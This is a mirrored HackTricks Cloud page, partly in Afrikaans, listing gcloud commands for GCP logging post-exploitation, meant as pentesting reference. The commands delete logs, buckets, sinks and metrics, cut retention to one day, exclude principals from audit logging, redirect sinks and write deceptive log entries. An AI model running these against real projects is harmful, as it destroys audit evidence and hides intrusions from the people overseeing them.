mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-18 07:35:41 -08:00
4.0 KiB
4.0 KiB
GCP - Logging Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Basiese Inligting
Vir meer inligting, kyk:
{{#ref}} ../gcp-services/gcp-logging-enum.md {{#endref}}
Vir ander maniere om monitering te ontwrig, kyk:
{{#ref}} gcp-monitoring-post-exploitation.md {{#endref}}
Standaard Logging
Deur die standaard sal jy nie gevang word net vir die uitvoering van lees aksies nie. Vir meer inligting, kyk die Logging Enum afdeling.
Voeg Uitsluitende Principaal By
In https://console.cloud.google.com/iam-admin/audit/allservices en https://console.cloud.google.com/iam-admin/audit is dit moontlik om principals by te voeg om nie logs te genereer nie. 'n Aanvaller kan dit misbruik om te voorkom dat hy gevang word.
Lees logs - logging.logEntries.list
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
logging.logs.delete
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
Skryf logs - logging.logEntries.create
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
logging.buckets.update
# Set retention period to 1 day (_Required has a fixed one of 400days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
logging.buckets.delete
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
logging.links.delete
# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>
logging.views.delete
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global
logging.views.update
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
logging.logMetrics.update
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
logging.logMetrics.delete
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
logging.sinks.delete
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
logging.sinks.update
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
# Createa filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"
# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination
# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
# Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions
# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
{{#include ../../../banners/hacktricks-training.md}}